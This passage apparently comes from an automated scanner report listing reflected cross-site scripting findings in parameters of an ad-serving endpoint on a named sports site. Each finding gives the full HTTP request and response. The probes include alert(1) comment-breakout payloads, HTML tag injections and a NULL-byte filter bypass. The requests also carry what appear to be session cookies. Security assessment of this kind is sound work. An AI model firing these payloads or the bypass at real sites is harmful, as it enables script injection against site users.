This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22072%3A22408%3A&NODE=22408&PTYPE=2001&PGUID=TbiQ3wq0Ht4AAD5KFuA&DVAR_SESSION=c47437<a>8fd2c6902b1&DVAR_SUBSESSION=4&cookiesOn=1&DVAR_USER=anon&has_takeover=0&DVAR_INSTLANG=en-US&x-cb=44551744&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/tennis
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; last_access=1303941343; sjxBeta=sysOn; surround=c|4; fsr.a=1303941356930; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 22:05:27 GMT
Server: Apache/2.2
Content-Length: 589
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 22:05:27 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22072%3A22408%3A&NODE=22408&PTYPE=2001&PGUID=TbiQ3wq0Ht4AAD5KFuA&DVAR_SESSION=c47437<a>8fd2c6902b1&DVAR_SUBSESSION=4&cookiesOn=1&DVAR_USER=anon&has_takeover=0&DVAR_INSTLANG=en-US&x-cb=44551744&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='175' PTYPE=
...[SNIP]...

3.587. http://mads.cbssports.com/mac-ad [DVAR_SESSION parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbssports.com
Path:	/mac-ad

Issue detail

The value of the DVAR_SESSION request parameter is copied into a JavaScript inline comment. The payload 3fd03*/alert(1)//a47ce0ea1a was submitted in the DVAR_SESSION parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22052%3A22135%3A&NODE=1&PTYPE=2000&PGUID=Tbiocgq0GW4AAEQFAnQ&DVAR_SESSION=f3fd03*/alert(1)//a47ce0ea1a&DVAR_SUBSESSION=1&cookiesOn=1&DVAR_USER=anon&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=67040581&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; sjxBeta=sysOn; MADTEST=1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; surround=f|1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; fsr.s={"v":1,"rid":"1303946257486_383429","cp":{"fantasynews":"no","pop":"now"},"pv":2,"to":5,"c":"http://www.cbssports.com/tennis/players/playerpage/566165/2011/victoria-azarenka","lc":{"d1":{"v":2,"s":false}},"cd":1,"sd":1,"f":1303946335587}; last_access=1303947378; fsr.a=1303947389291

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:40:41 GMT
Server: Apache/2.2
Content-Length: 1681
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:40:41 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22052%3A22135%3A&NODE=1&PTYPE=2000&PGUID=Tbiocgq0GW4AAEQFAnQ&DVAR_SESSION=f3fd03*/alert(1)//a47ce0ea1a&DVAR_SUBSESSION=1&cookiesOn=1&DVAR_USER=anon&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=67040581&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('
...[SNIP]...

3.588. http://mads.cbssports.com/mac-ad [DVAR_SUBSESSION parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cbssports.com
Path:	/mac-ad

Issue detail

The value of the DVAR_SUBSESSION request parameter is copied into the HTML document as plain text between tags. The payload 63f4b<a>49257def82a was submitted in the DVAR_SUBSESSION parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22072%3A22408%3A&NODE=22408&PTYPE=2001&PGUID=TbiQ3wq0Ht4AAD5KFuA&DVAR_SESSION=c&DVAR_SUBSESSION=463f4b<a>49257def82a&cookiesOn=1&DVAR_USER=anon&has_takeover=0&DVAR_INSTLANG=en-US&x-cb=44551744&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/tennis
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; last_access=1303941343; sjxBeta=sysOn; surround=c|4; fsr.a=1303941356930; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 22:05:58 GMT
Server: Apache/2.2
Content-Length: 590
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 22:05:58 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22072%3A22408%3A&NODE=22408&PTYPE=2001&PGUID=TbiQ3wq0Ht4AAD5KFuA&DVAR_SESSION=c&DVAR_SUBSESSION=463f4b<a>49257def82a&cookiesOn=1&DVAR_USER=anon&has_takeover=0&DVAR_INSTLANG=en-US&x-cb=44551744&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='175' PTYPE='2001' NCAT='22072
...[SNIP]...

3.589. http://mads.cbssports.com/mac-ad [DVAR_SUBSESSION parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbssports.com
Path:	/mac-ad

Issue detail

The value of the DVAR_SUBSESSION request parameter is copied into a JavaScript inline comment. The payload 891dc*/alert(1)//3203a2e025f was submitted in the DVAR_SUBSESSION parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22052%3A22135%3A&NODE=1&PTYPE=2000&PGUID=Tbiocgq0GW4AAEQFAnQ&DVAR_SESSION=f&DVAR_SUBSESSION=1891dc*/alert(1)//3203a2e025f&cookiesOn=1&DVAR_USER=anon&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=67040581&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; sjxBeta=sysOn; MADTEST=1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; surround=f|1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; fsr.s={"v":1,"rid":"1303946257486_383429","cp":{"fantasynews":"no","pop":"now"},"pv":2,"to":5,"c":"http://www.cbssports.com/tennis/players/playerpage/566165/2011/victoria-azarenka","lc":{"d1":{"v":2,"s":false}},"cd":1,"sd":1,"f":1303946335587}; last_access=1303947378; fsr.a=1303947389291

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:40:54 GMT
Server: Apache/2.2
Content-Length: 1683
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:40:54 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22052%3A22135%3A&NODE=1&PTYPE=2000&PGUID=Tbiocgq0GW4AAEQFAnQ&DVAR_SESSION=f&DVAR_SUBSESSION=1891dc*/alert(1)//3203a2e025f&cookiesOn=1&DVAR_USER=anon&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=67040581&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('
...[SNIP]...

3.590. http://mads.cbssports.com/mac-ad [DVAR_USER parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cbssports.com
Path:	/mac-ad

Issue detail

The value of the DVAR_USER request parameter is copied into the HTML document as plain text between tags. The payload 2bd53<a>140cc25ad16 was submitted in the DVAR_USER parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22072%3A22408%3A&NODE=22408&PTYPE=2001&PGUID=TbiQ3wq0Ht4AAD5KFuA&DVAR_SESSION=c&DVAR_SUBSESSION=4&cookiesOn=1&DVAR_USER=anon2bd53<a>140cc25ad16&has_takeover=0&DVAR_INSTLANG=en-US&x-cb=44551744&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/tennis
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; last_access=1303941343; sjxBeta=sysOn; surround=c|4; fsr.a=1303941356930; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 22:07:09 GMT
Server: Apache/2.2
Content-Length: 589
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 22:07:09 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22072%3A22408%3A&NODE=22408&PTYPE=2001&PGUID=TbiQ3wq0Ht4AAD5KFuA&DVAR_SESSION=c&DVAR_SUBSESSION=4&cookiesOn=1&DVAR_USER=anon2bd53<a>140cc25ad16&has_takeover=0&DVAR_INSTLANG=en-US&x-cb=44551744&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='175' PTYPE='2001' NCAT='22072:22408:' CID='' TO BEACON T
...[SNIP]...

3.591. http://mads.cbssports.com/mac-ad [DVAR_USER parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbssports.com
Path:	/mac-ad

Issue detail

The value of the DVAR_USER request parameter is copied into a JavaScript inline comment. The payload b2169*/alert(1)//510ff4af8c5 was submitted in the DVAR_USER parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22052%3A22135%3A&NODE=1&PTYPE=2000&PGUID=Tbiocgq0GW4AAEQFAnQ&DVAR_SESSION=f&DVAR_SUBSESSION=1&cookiesOn=1&DVAR_USER=anonb2169*/alert(1)//510ff4af8c5&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=67040581&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; sjxBeta=sysOn; MADTEST=1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; surround=f|1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; fsr.s={"v":1,"rid":"1303946257486_383429","cp":{"fantasynews":"no","pop":"now"},"pv":2,"to":5,"c":"http://www.cbssports.com/tennis/players/playerpage/566165/2011/victoria-azarenka","lc":{"d1":{"v":2,"s":false}},"cd":1,"sd":1,"f":1303946335587}; last_access=1303947378; fsr.a=1303947389291

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:41:09 GMT
Server: Apache/2.2
Content-Length: 1681
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:41:09 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22052%3A22135%3A&NODE=1&PTYPE=2000&PGUID=Tbiocgq0GW4AAEQFAnQ&DVAR_SESSION=f&DVAR_SUBSESSION=1&cookiesOn=1&DVAR_USER=anonb2169*/alert(1)//510ff4af8c5&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=67040581&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('
...[SNIP]...

3.592. http://mads.cbssports.com/mac-ad [GLOBAL&CLIENT:ID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbssports.com
Path:	/mac-ad

Issue detail

The value of the GLOBAL&CLIENT:ID request parameter is copied into a JavaScript inline comment. The payload 7e3e4*/alert(1)//57298c86a7c was submitted in the GLOBAL&CLIENT:ID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS7e3e4*/alert(1)//57298c86a7c&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22052%3A22135%3A&NODE=1&PTYPE=2000&PGUID=Tbiocgq0GW4AAEQFAnQ&DVAR_SESSION=f&DVAR_SUBSESSION=1&cookiesOn=1&DVAR_USER=anon&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=67040581&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; sjxBeta=sysOn; MADTEST=1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; surround=f|1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; fsr.s={"v":1,"rid":"1303946257486_383429","cp":{"fantasynews":"no","pop":"now"},"pv":2,"to":5,"c":"http://www.cbssports.com/tennis/players/playerpage/566165/2011/victoria-azarenka","lc":{"d1":{"v":2,"s":false}},"cd":1,"sd":1,"f":1303946335587}; last_access=1303947378; fsr.a=1303947389291

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:38:12 GMT
Server: Apache/2.2
Content-Length: 1641
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:38:12 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS7e3e4*/alert(1)//57298c86a7c&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22052%3A22135%3A&NODE=1&PTYPE=2000&PGUID=Tbiocgq0GW4AAEQFAnQ&DVAR_SESSION=f&DVAR_SUBSESSION=1&cookiesOn=1&DVAR_USER=anon&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=
...[SNIP]...

3.593. http://mads.cbssports.com/mac-ad [GLOBAL&CLIENT:ID parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cbssports.com
Path:	/mac-ad

Issue detail

The value of the GLOBAL&CLIENT:ID request parameter is copied into the HTML document as plain text between tags. The payload b6752<a>a664fa28720 was submitted in the GLOBAL&CLIENT:ID parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJSb6752<a>a664fa28720&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22072%3A22408%3A&NODE=22408&PTYPE=2001&PGUID=TbiQ3wq0Ht4AAD5KFuA&DVAR_SESSION=c&DVAR_SUBSESSION=4&cookiesOn=1&DVAR_USER=anon&has_takeover=0&DVAR_INSTLANG=en-US&x-cb=44551744&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/tennis
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; last_access=1303941343; sjxBeta=sysOn; surround=c|4; fsr.a=1303941356930; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 21:58:10 GMT
Server: Apache/2.2
Content-Length: 589
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 21:58:10 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJSb6752<a>a664fa28720&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22072%3A22408%3A&NODE=22408&PTYPE=2001&PGUID=TbiQ3wq0Ht4AAD5KFuA&DVAR_SESSION=c&DVAR_SUBSESSION=4&cookiesOn=1&DVAR_USER=anon&has_takeover=0&DVAR_INSTLANG=en-U
...[SNIP]...

3.594. http://mads.cbssports.com/mac-ad [IREFER_HOST parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cbssports.com
Path:	/mac-ad

Issue detail

The value of the IREFER_HOST request parameter is copied into the HTML document as plain text between tags. The payload 7e1fe<a>4d8593de3d0 was submitted in the IREFER_HOST parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22072%3A22416%3A23431%3A&NODE=23431&PTYPE=6866&PGUID=TbikVQq0GW4AAGmuT7M&DVAR_SESSION=f&DVAR_SUBSESSION=1&cookiesOn=1&DVAR_USER=anon&has_takeover=0&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=12397701&IREFER_HOST=cbssports.com7e1fe<a>4d8593de3d0&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/tennis/players/playerpage/566165/2011/victoria-azarenka
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; sjxBeta=sysOn; MADTEST=1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; surround=f|1; mad_rsi_segs=ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10562; last_access=1303946325; fsr.s={"v":1,"rid":"1303946257486_383429","cp":{"fantasynews":"no","pop":"now"},"pv":1,"to":3,"c":"http://www.cbssports.com/tennis","lc":{"d1":{"v":1,"s":false}},"cd":1,"sd":1,"f":1303946335587}; fsr.a=1303946339697

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:27:11 GMT
Server: Apache/2.2
Content-Length: 665
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:27:11 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22072%3A22416%3A23431%3A&NODE=23431&PTYPE=6866&PGUID=TbikVQq0GW4AAGmuT7M&DVAR_SESSION=f&DVAR_SUBSESSION=1&cookiesOn=1&DVAR_USER=anon&has_takeover=0&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=12397701&IREFER_HOST=cbssports.com7e1fe<a>4d8593de3d0&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='175' PTYPE='6866' NCAT='22072:22416:23431:' CID='' TO BEACON TEXT) *//* MAC [r20101202-0915-v1-13-13-Json
...[SNIP]...

3.595. http://mads.cbssports.com/mac-ad [META&ADSEPARATOR parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbssports.com
Path:	/mac-ad

Issue detail

The value of the META&ADSEPARATOR request parameter is copied into the HTML document as plain text between tags. The payload %005294c<script>alert(1)</script>98592241dc was submitted in the META&ADSEPARATOR parameter. This input was echoed as 5294c<script>alert(1)</script>98592241dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /mac-ad?META&ADSEPARATOR=%3B%005294c<script>alert(1)</script>98592241dc&GLOBAL&REQID=1&CLIENT:ID=SJS&CELT=jph&PAGESTATE=&SITE=175&BRAND=59&NCAT=22058%3A22207%3A&NODE=22207&PTYPE=2001&PGUID=TbiQ3wq0GVcAACnZCmE&DVAR_SESSION=c&DVAR_SUBSESSION=4&cookiesOn=1&DVAR_EXCLUDE=golf&DVAR_USER=anon&has_takeover=0&DVAR_INSTLANG=en-US&x-cb=35742613&ADREQ&SP=234&POS=100&WIDTH=970&HEIGHT=0&cookiesOn=1&divId=cbsiad234_100&ADREQ&SP=110&POS=100&cookiesOn=1&divId=cbsiad110_100&ADREQ&SP=16&POS=100&WIDTH=300&HEIGHT=260&cookiesOn=1&divId=cbsiad16_100&ADREQ&SP=119&POS=100&cookiesOn=1&divId=cbsiad119_100 HTTP/1.1
Host: mads.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/golf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; last_access=1303941343; sjxBeta=sysOn; surround=c|4; fsr.a=1303941356930; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 21:57:34 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 21:57:34 GMT
Content-Length: 17134

/* MAC ad */cbsiParseAdResponse({requestId:"1",divId:"cbsiad234_100",segmentId:"504465",rotatorId:"15989",creativeSizeId:"207",isBlank:"0",seg_pageState:"2312;BC2312-51",adHTML:"<div id=\"madison_ad_2
...[SNIP]...
</div>"})/* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] phx1-ad-xw2.cnet.com::1691535680 2011.04.27.21.57.34 *//* MAC T 0.1.4.5 */;.5294c<script>alert(1)</script>98592241dc/* MAC ad */cbsiParseAdResponse({requestId:"1",divId:"cbsiad110_100",segmentId:"503380",rotatorId:"18229",creativeSizeId:"79",isBlank:"0",seg_pageState:"",adHTML:"<style type=\"text/css\">
...[SNIP]...

3.596. http://mads.cbssports.com/mac-ad [NCAT parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbssports.com
Path:	/mac-ad

Issue detail

The value of the NCAT request parameter is copied into a JavaScript inline comment. The payload eb4d2*/alert(1)//1caa87a39cf was submitted in the NCAT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22052%3A22135%3Aeb4d2*/alert(1)//1caa87a39cf&NODE=1&PTYPE=2000&PGUID=Tbiocgq0GW4AAEQFAnQ&DVAR_SESSION=f&DVAR_SUBSESSION=1&cookiesOn=1&DVAR_USER=anon&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=67040581&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/
